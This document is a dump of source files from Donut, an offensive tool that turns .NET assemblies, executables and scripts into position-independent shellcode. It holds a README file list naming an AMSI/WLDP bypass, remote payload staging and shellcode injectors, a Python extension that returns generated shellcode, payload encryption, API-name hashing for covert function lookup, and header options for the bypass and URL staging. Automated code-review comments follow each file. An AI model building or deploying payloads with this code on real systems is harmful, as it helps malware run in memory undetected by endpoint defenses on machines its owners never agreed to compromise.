219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
0 LICENSE
1 MANIFEST.in
2 Makefile
3 Makefile.mingw
4 Makefile.msvc
5 README.md
6 donut.c
7 donutmodule.c
8 encrypt.c
9 hash.c
10 setup.py
11 version-release-notes.txt
12 ./donut.c
13 ./donutmodule.c
14 ./encrypt.c
15 ./hash.c
16 ./DonutTest/hello.c
17 ./DonutTest/testcase.c
18 ./include/mmap-windows.c
19 ./payload/activescript.c
20 ./payload/bypass.c
21 ./payload/clib.c
22 ./payload/getpc.c
23 ./payload/http_client.c
24 ./payload/inject.c
25 ./payload/inmem_dotnet.c
26 ./payload/inmem_pe.c
27 ./payload/inmem_script.c
28 ./payload/inmem_xsl.c
29 ./payload/payload.c
30 ./payload/peb.c
31 ./payload/runsc.c
32 ./payload/wscript.c
33 ./payload/exe2h/exe2h.c
34 ./payload/exe2h/mmap-windows.c
35 ./payload/test/api_test.c
36 ./payload/test/call_api_dll.c
37 ./payload/test/hello.c
38 docs/2019-08-21-Python_Extension.md
39 docs/2019-5-31-Apple-Fritter.md
40 docs/2019-5-9-Introducing-Donut.md
41 docs/api.html
42 docs/api.md
43 donut_shellcode.egg-info/PKG-INFO
44 donut_shellcode.egg-info/SOURCES.txt
45 donut_shellcode.egg-info/dependency_links.txt
46 donut_shellcode.egg-info/top_level.txt
47 donut_shellcode.egg-info/zip-safe
48 include/donut.h
49 include/encrypt.h
50 include/hash.h
51 include/mmap-windows.c
52 include/mmap.h
53 include/pe.h
54 include/poppack.h
55 include/pshpack1.h
56 include/pshpack2.h
57 include/pshpack4.h
58 include/pshpack8.h
59 include/wintypes.h
60 lib/donut.h
61 payload/Makefile.mingw
62 payload/Makefile.msvc
63 payload/activescript.c
64 payload/activescript.h
65 payload/amsi.h
66 payload/bypass.c
67 payload/call_api.asm
68 payload/call_api_bin.h
69 payload/clib.c
70 payload/clr.h
71 payload/getpc.c
72 payload/http_client.c
73 payload/inject.c
74 payload/inmem_dotnet.c
75 payload/inmem_pe.c
76 payload/inmem_script.c
77 payload/inmem_xsl.c
78 payload/order.txt
79 payload/payload.c
80 payload/payload.h
81 payload/payload_exe_x64.h
82 payload/payload_exe_x86.h
83 payload/peb.c
84 payload/peb.h
85 payload/runsc.c
86 payload/winapi.h
87 payload/wscript.c
88 payload/wscript.h
89 payload/xmldom.h
90 payload/exe2h/Makefile
91 payload/exe2h/Makefile.mingw
92 payload/exe2h/Makefile.msvc
93 payload/exe2h/exe2h.c
94 payload/exe2h/exe2h.obj
95 payload/exe2h/mmap-windows.c
96 payload/exe2h/mmap-windows.obj
97 payload/exe2h/mmap.h
98 payload/test/api_test.c
99 payload/test/call_api_dll.c
100 payload/test/hello.c
101 payload/test/hello.cs
102 payload/test/rdt.cpp
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Python C Extension by @byt3bl33d3r
6
7 Redistribution and use in source and binary forms, with or without
8 modification, are permitted provided that the following conditions are met:
9
10 * Redistributions of source code must retain the above copyright notice, this
11 list of conditions and the following disclaimer.
12
13 * Redistributions in binary form must reproduce the above copyright notice,
14 this list of conditions and the following disclaimer in the documentation
15 and/or other materials provided with the distribution.
16
17 * Neither the name of the copyright holder nor the names of its
18 contributors may be used to endorse or promote products derived from
19 this software without specific prior written permission.
20
21 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
22 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
23 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
24 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
25 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
26 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
27 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
28 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
29 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
30 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
31 */
32
33 #include <Python.h>
34 #include "donut.h"
35
36
37 static PyObject *Donut_Create(PyObject *self, PyObject *args, PyObject *keywds) {
38 int *arch = NULL;
39 int *bypass = NULL;
40 char *appdomain = NULL;
41 char *file = NULL;
42 char *runtime = NULL;
43 char *url = NULL;
44 char *cls = NULL;
45 char *method = NULL;
46 char *params = NULL;
47
48 int err;
49
50 static char *kwlist[] = {"file", "url", "arch", "bypass", "cls", "method", "params", "runtime", "appdomain", NULL};
51 if (!PyArg_ParseTupleAndKeywords(args, keywds, "s|siisssss", kwlist, &file, &url, &arch, &bypass, &cls, &method, &params, &runtime, &appdomain)) {
52 return NULL;
53 }
54
55 DONUT_CONFIG c;
56
57 // zero initialize configuration
58 memset(&c, 0, sizeof(c));
59
60 // default type is position independent code for dual-mode (x86 + amd64)
61 c.inst_type = DONUT_INSTANCE_PIC;
62 c.arch = DONUT_ARCH_X84;
63 c.bypass = DONUT_BYPASS_CONTINUE; // continues loading even if disabling AMSI/WLDP fails
64
65 // target cpu architecture
66 if (arch != NULL) {
67 c.arch = arch;
68 }
69
70 // bypass options
71 if (bypass != NULL) {
72 c.bypass = bypass;
73 }
74
75 // name of appdomain to use
76 if (appdomain != NULL) {
77 strncpy(c.domain, appdomain, DONUT_MAX_NAME - 1);
78 }
79
80 // assembly to use
81 if (file != NULL) {
82 strncpy(c.file, file, DONUT_MAX_NAME - 1);
83 }
84
85 //runtime version to use
86 if (runtime != NULL) {
87 strncpy(c.runtime, runtime, DONUT_MAX_NAME - 1);
88 }
89
90 // url of remote assembly
91 if (url != NULL) {
92 strncpy(c.url, url, DONUT_MAX_URL - 2);
93 c.inst_type = DONUT_INSTANCE_URL;
94 }
95
96 // class
97 if (cls != NULL) {
98 strncpy(c.cls, cls, DONUT_MAX_NAME - 1);
99 }
100
101 // method or exported api symbol
102 if (method != NULL) {
103 strncpy(c.method, method, DONUT_MAX_NAME - 1);
104 }
105
106 // parameters to method/exported API
107 if (params != NULL) {
108 strncpy(c.param, params, sizeof(c.param) - 1);
109 }
110
111 err = DonutCreate(&c);
112
113 /*
114 if (!(c.pic_len > 0)) {
115 return NULL;
116 }
117 */
118
119 PyObject *shellcode = Py_BuildValue("y#", c.pic, c.pic_len);
120
121 DonutDelete(&c);
122
123 return shellcode;
124 }
125
126 // module's function table
127 static PyMethodDef Donut_FunctionsTable[] = {
128 {
129 "create", // name exposed to Python
130 Donut_Create, // C wrapper function
131 METH_VARARGS|METH_KEYWORDS,
132 "Calls DonutCreate to generate shellcode for a .NET assembly" // documentation
133 }, {
134 NULL, NULL, 0, NULL
135 }
136 };
137
138 // modules definition
139 static struct PyModuleDef Donut_Module = {
140 PyModuleDef_HEAD_INIT,
141 "donut", // name of module exposed to Python
142 "Donut Python C extension", // module documentation
143 -1,
144 Donut_FunctionsTable
145 };
146
147 PyMODINIT_FUNC PyInit_donut(void) {
148 return PyModule_Create(&Donut_Module);
149 }
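Review bot: `arch` and `bypass` are declared as `int *` but the two `i` conversions in the `"s|siisssss"` format write a plain `int` through `&arch`/`&bypass`, so `c.arch = arch;` and `c.bypass = bypass;` store pointer values into `int` fields and only work by accident of pointer-to-int truncation, while an explicitly supplied `0` is indistinguishable from "not supplied". Declare them as ints preloaded with the defaults, `int arch = DONUT_ARCH_X84, bypass = DONUT_BYPASS_CONTINUE;`, pass their addresses unchanged, and assign `c.arch = arch; c.bypass = bypass;` unconditionally in place of the two `!= NULL` checks. The `err` returned by `DonutCreate` is never examined, so a failed generation hands Python an empty bytes object instead of an exception; `if (err != DONUT_ERROR_SUCCESS) return PyErr_Format(PyExc_RuntimeError, "DonutCreate failed: %d", err);` before the `Py_BuildValue` call surfaces it. The `y#` format also expects a `Py_ssize_t` (or `int` without `PY_SSIZE_T_CLEAN`) length but is handed the `uint64_t` `c.pic_len` through varargs; define `PY_SSIZE_T_CLEAN` before `#include <Python.h>` and pass `(Py_ssize_t)c.pic_len`.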
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "encrypt.h"
32
33 static void chaskey(void *mk, void *p) {
34 uint32_t i,*w=p,*k=mk;
35
36 // add 128-bit master key
37 for(i=0;i<4;i++) w[i]^=k[i];
38
39 // apply 16 rounds of permutation
40 for(i=0;i<16;i++) {
41 w[0] += w[1],
42 w[1] = ROTR32(w[1], 27) ^ w[0],
43 w[2] += w[3],
44 w[3] = ROTR32(w[3], 24) ^ w[2],
45 w[2] += w[1],
46 w[0] = ROTR32(w[0], 16) + w[3],
47 w[3] = ROTR32(w[3], 19) ^ w[0],
48 w[1] = ROTR32(w[1], 25) ^ w[2],
49 w[2] = ROTR32(w[2], 16);
50 }
51 // add 128-bit master key
52 for(i=0;i<4;i++) w[i]^=k[i];
53 }
54
55 // encrypt/decrypt data in counter mode
56 void donut_encrypt(void *mk, void *ctr, void *data, size_t len) {
57 uint8_t x[CIPHER_BLK_LEN],
58 *p=(uint8_t*)data,
59 *c=(uint8_t*)ctr;
60 int i, r;
61
62 while(len) {
63 // copy counter+nonce to local buffer
64 for(i=0;i<CIPHER_BLK_LEN;i++)
65 x[i] = c[i];
66
67 // donut_encrypt x
68 ENCRYPT(mk, &x);
69
70 // XOR plaintext with ciphertext
71 r = len > CIPHER_BLK_LEN ? CIPHER_BLK_LEN : len;
72
73 for(i=0;i<r;i++)
74 p[i] ^= x[i];
75
76 // update length + position
77 len -= r; p += r;
78
79 // update counter
80 for(i=CIPHER_BLK_LEN;i>0;i--)
81 if(++c[i-1]) break;
82 }
83 }
84
85 #ifdef TEST
86
87 #include <stdio.h>
88 #include <string.h>
89 #include <stdint.h>
90
91 // 128-bit master key
92 uint8_t key[16] =
93 { 0x56, 0x09, 0xe9, 0x68, 0x5f, 0x58, 0xe3, 0x29,
94 0x40, 0xec, 0xec, 0x98, 0xc5, 0x22, 0x98, 0x2f };
95
96 // 128-bit plain text
97 uint8_t plain[16]=
98 { 0xb8, 0x23, 0x28, 0x26, 0xfd, 0x5e, 0x40, 0x5e,
99 0x69, 0xa3, 0x01, 0xa9, 0x78, 0xea, 0x7a, 0xd8 };
100
101 // 128-bit cipher text
102 uint8_t cipher[16] =
103 { 0xd5, 0x60, 0x8d, 0x4d, 0xa2, 0xbf, 0x34, 0x7b,
104 0xab, 0xf8, 0x77, 0x2f, 0xdf, 0xed, 0xde, 0x07 };
105
106 int main(void) {
107 uint8_t data[16];
108 int equ;
109
110 memcpy(data, plain, 16);
111 chaskey(key, data);
112 equ = (memcmp(data, cipher, 16)==0);
113 printf("Chaskey test : %s\n", equ ? "OK" : "FAILED");
114 return 0;
115 }
116
117 #endif
118
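Review bot: `chaskey` reinterprets its `void *` arguments as `uint32_t *` (`*w=p,*k=mk`), yet `donut_encrypt` passes it the local `uint8_t x[CIPHER_BLK_LEN]`, which carries no alignment guarantee and makes the word accesses an aliasing violation an optimizing build may miscompile; the result is also host-byte-order dependent. Loading the four block words and four key words byte-wise (little-endian, which is presumably how the vector checked in the `TEST` main was produced) into local `uint32_t` arrays and storing the block back the same way removes both problems; if this file is also linked into the libc-free payload, as the `clib.c` entry in the README suggests, a small loop is safer there than `memcpy`. The comment on `donut_encrypt` should state the contract the body establishes, e.g. `// mk: CIPHER_KEY_LEN bytes, ctr: CIPHER_BLK_LEN bytes (counter+nonce); ctr is incremented in place, big-endian, once per block consumed, so the caller's counter is left ready for the next call`. The `TEST` main exercises only the block permutation, so the CTR path and the carry at `++c[i-1]` are unverified.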
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2017 Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "hash.h"
32
33 // SPECK-64/128
34 static uint64_t speck(void *mk, uint64_t p) {
35 uint32_t k[4], i, t;
36 union {
37 uint32_t w[2];
38 uint64_t q;
39 } x;
40
41 // copy 64-bit plaintext to local buffer
42 x.q = p;
43
44 // copy 128-bit master key to local buffer
45 for(i=0;i<4;i++) k[i]=((uint32_t*)mk)[i];
46
47 for(i=0;i<27;i++) {
48 // encrypt 64-bit plaintext
49 x.w[0] = (ROTR32(x.w[0], 8) + x.w[1]) ^ k[0];
50 x.w[1] = ROTR32(x.w[1],29) ^ x.w[0];
51
52 // create next 32-bit subkey
53 t = k[3];
54 k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
55 k[0] = ROTR32(k[0],29) ^ k[3];
56 k[1] = k[2]; k[2] = t;
57 }
58 // return 64-bit ciphertext
59 return x.q;
60 }
61
62 uint64_t maru(const void *input, uint64_t iv) {
63 uint64_t h;
64 uint32_t len, idx, end;
65 const char *api = (const char*)input;
66
67 union {
68 uint8_t b[MARU_BLK_LEN];
69 uint32_t w[MARU_BLK_LEN/4];
70 } m;
71
72 // set H to initial value
73 h = iv;
74
75 for(idx=0, len=0, end=0;!end;) {
76 // end of string or max len?
77 if(api[len] == 0 || len == MARU_MAX_STR) {
78 // zero remainder of M
79 Memset(&m.b[idx], 0, MARU_BLK_LEN - idx);
80 // store the end bit
81 m.b[idx] = 0x80;
82 // have we space in M for api length?
83 if(idx >= MARU_BLK_LEN - 4) {
84 // no, update H with E
85 h ^= MARU_CRYPT(&m, h);
86 // zero M
87 Memset(&m, 0, MARU_BLK_LEN);
88 }
89 // store total length in bits
90 m.w[(MARU_BLK_LEN/4)-1] = (len * 8);
91 idx = MARU_BLK_LEN;
92 end++;
93 } else {
94 // store character from api string
95 m.b[idx] = (uint8_t)api[len];
96 idx++; len++;
97 }
98 if(idx == MARU_BLK_LEN) {
99 // update H with E
100 h ^= MARU_CRYPT(&m, h);
101 // reset idx
102 idx = 0;
103 }
104 }
105 return h;
106 }
107
108 #ifdef TEST
109
110 #include <stdio.h>
111 #include <stdlib.h>
112 #include <string.h>
113
114 int main(int argc, char *argv[]) {
115
116 uint64_t ulDllHash, ulApiHash, iv;
117 char *api, *dll;
118
119 if(argc != 4) {
120 printf("\nusage: maru <iv> <dll> <api>\n");
121 return 0;
122 }
123
124 // convert hexadecimal IV to binary
125 iv = strtoull(argv[1], NULL, 16);
126 dll = argv[2];
127 api = argv[3];
128
129 printf("\nIV : %p\n", (void*)iv);
130
131 ulDllHash = maru(dll, iv);
132 printf("DLL : %p\n", (void*)ulDllHash);
133
134 ulApiHash = maru(api, iv) + ulDllHash;
135 printf("API : %p\n", (void*)ulApiHash);
136
137 return 0;
138 }
139 #endif
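Review bot: In `maru`, the condition `if(api[len] == 0 || len == MARU_MAX_STR)` reads `api[len]` before the length cap is tested, so a 64-byte buffer without a terminator is read one byte past its end; swapping the operands, `if(len == MARU_MAX_STR || api[len] == 0)`, keeps the cap effective. The digest is host-endian in two places — `speck` overlays `w[2]`/`q` through a union and the bit length is stored through `m.w[(MARU_BLK_LEN/4)-1]` — so a generator built on a big-endian host would compute different API hashes from an x86 payload; if only little-endian hosts are supported, a one-line comment on `maru` saying so would prevent a surprise. In the `TEST` main the 64-bit values are printed via `%p` after a cast to `void*`, which truncates them on a 32-bit build; `printf("IV : %016" PRIx64 "\n", iv);` with `<inttypes.h>` prints them exactly.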
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef DONUT_H
32 #define DONUT_H
33
34 #include <stdint.h>
35 #include <stdio.h>
36 #include <stdlib.h>
37 #include <string.h>
38 #include <sys/stat.h>
39 #include <inttypes.h>
40 #include <fcntl.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #ifndef PAYLOAD_H
46 #include "mmap.h"
47 #endif
48 #if defined(_MSC_VER)
49 #pragma comment(lib, "advapi32.lib")
50 #endif
51 #else
52 #define LINUX
53 #include <unistd.h>
54 #include <sys/types.h>
55 #include <sys/mman.h>
56 #include "pe.h"
57 #endif
58
59 #ifndef PAYLOAD_H
60
61 #if defined(DEBUG)
62 #define DPRINT(...) { \
63 fprintf(stderr, "DEBUG: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
64 fprintf(stderr, __VA_ARGS__); \
65 fprintf(stderr, "\n"); \
66 }
67 #else
68 #define DPRINT(...) // Don't do anything in release builds
69 #endif
70
71 #endif
72
73 #if !defined(NOCRYPTO)
74 #include "hash.h" // api hashing
75 #include "encrypt.h" // symmetric encryption of instance+module
76 #endif
77
78 #if !defined(WINDOWS)
79 #define strnicmp(x,y,z) strncasecmp(x,y,z)
80 typedef uint64_t ULONG64, *PULONG64;
81 typedef uint32_t DWORD, *PDWORD;
82 typedef uint16_t WORD, *PWORD;
83 typedef uint8_t BYTE, *PBYTE;
84
85 typedef char CHAR, *PCHAR;
86 typedef size_t SIZE_T;
87
88 typedef struct _GUID {
89 DWORD Data1;
90 WORD Data2;
91 WORD Data3;
92 BYTE Data4[8];
93 } GUID;
94 #endif
95
96 #define DONUT_KEY_LEN CIPHER_KEY_LEN
97 #define DONUT_BLK_LEN CIPHER_BLK_LEN
98
99 #define DONUT_ERROR_SUCCESS 0
100 #define DONUT_ERROR_FILE_NOT_FOUND 1
101 #define DONUT_ERROR_FILE_EMPTY 2
102 #define DONUT_ERROR_FILE_ACCESS 3
103 #define DONUT_ERROR_FILE_INVALID 4
104 #define DONUT_ERROR_NET_PARAMS 5
105 #define DONUT_ERROR_NO_MEMORY 6
106 #define DONUT_ERROR_INVALID_ARCH 7
107 #define DONUT_ERROR_INVALID_URL 8
108 #define DONUT_ERROR_URL_LENGTH 9
109 #define DONUT_ERROR_INVALID_PARAMETER 10
110 #define DONUT_ERROR_RANDOM 11
111 #define DONUT_ERROR_DLL_FUNCTION 12
112 #define DONUT_ERROR_ARCH_MISMATCH 13
113 #define DONUT_ERROR_DLL_PARAM 14
114 #define DONUT_ERROR_BYPASS_INVALID 15
115
116 // target architecture
117 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
118 #define DONUT_ARCH_X86 1 // x86
119 #define DONUT_ARCH_X64 2 // AMD64
120 #define DONUT_ARCH_X84 3 // AMD64 + x86
121
122 // module type
123 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
124 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
125 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
126 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
127 #define DONUT_MODULE_VBS 5 // VBScript
128 #define DONUT_MODULE_JS 6 // JavaScript or JScript
129 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
130
131 // instance type
132 #define DONUT_INSTANCE_PIC 1 // Self-contained
133 #define DONUT_INSTANCE_URL 2 // Download from remote server
134
135 // AMSI/WLDP options
136 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
137 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
138 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
139
140 // apparently C# can support 2^16 or 65,536 parameters
141 // we support up to eight for now :)
142 // Changing these would require updating call_api.asm for unmanaged EXE/DLL
143 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
144 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
145 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
146 #define DONUT_MAX_URL 256
147 #define DONUT_MAX_MODNAME 8
148 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
149 #define DONUT_VER_LEN 32
150 #define DONUT_DOMAIN_LEN 8
151
152 #define DONUT_RUNTIME_NET2 "v2.0.50727"
153 #define DONUT_RUNTIME_NET4 "v4.0.30319"
154
155 #define NTDLL_DLL "ntdll.dll"
156 #define KERNEL32_DLL "kernel32.dll"
157 #define ADVAPI32_DLL "advapi32.dll"
158 #define CRYPT32_DLL "crypt32.dll"
159 #define MSCOREE_DLL "mscoree.dll"
160 #define OLE32_DLL "ole32.dll"
161 #define OLEAUT32_DLL "oleaut32.dll"
162 #define WININET_DLL "wininet.dll"
163 #define COMBASE_DLL "combase.dll"
164 #define USER32_DLL "user32.dll"
165 #define SHLWAPI_DLL "shlwapi.dll"
166
167 // Per the ECMA spec, the section data looks like this:
168 // taken from https://github.com/dotnet/coreclr/
169 //
170 typedef struct tagMDSTORAGESIGNATURE {
171 ULONG lSignature; // "Magic" signature.
172 USHORT iMajorVer; // Major file version.
173 USHORT iMinorVer; // Minor file version.
174 ULONG iExtraData; // Offset to next structure of information
175 ULONG iVersionString; // Length of version string
176 BYTE pVersion[0]; // Version string
177 } MDSTORAGESIGNATURE, *PMDSTORAGESIGNATURE;
178
179 //
180 typedef struct _file_info_t {
181 int fd;
182 uint64_t size;
183 uint8_t *map;
184
185 // the following are set for unmanaged or .NET PE/DLL files
186 int type;
187 int arch;
188 char ver[DONUT_VER_LEN];
189 } file_info;
190
191 typedef struct _API_IMPORT {
192 const char *module;
193 const char *name;
194 } API_IMPORT, *PAPI_IMPORT;
195
196 typedef struct _DONUT_CRYPT {
197 BYTE mk[DONUT_KEY_LEN]; // master key
198 BYTE ctr[DONUT_BLK_LEN]; // counter + nonce
199 } DONUT_CRYPT, *PDONUT_CRYPT;
200
201 // everything required for a module goes in the following structure
202 typedef struct _DONUT_MODULE {
203 DWORD type; // EXE, DLL, JS, VBS, XSL
204 WCHAR runtime[DONUT_MAX_NAME]; // runtime version for .NET EXE/DLL
205 WCHAR domain[DONUT_MAX_NAME]; // domain name to use for .NET EXE/DLL
206 WCHAR cls[DONUT_MAX_NAME]; // name of class and optional namespace for .NET EXE/DLL
207 WCHAR method[DONUT_MAX_NAME]; // name of method to invoke for .NET DLL or api for unmanaged DLL
208 DWORD param_cnt; // number of parameters for DLL/EXE
209 WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE
210 CHAR sig[DONUT_MAX_NAME]; // random string to verify decryption
211 ULONG64 mac; // to verify decryption was ok
212 ULONG64 len; // size of EXE/DLL/XSL/JS/VBS file
213 BYTE data[4]; // data of EXE/DLL/XSL/JS/VBS file
214 } DONUT_MODULE, *PDONUT_MODULE;
215
216 // everything required for an instance goes into the following structure
217 typedef struct _DONUT_INSTANCE {
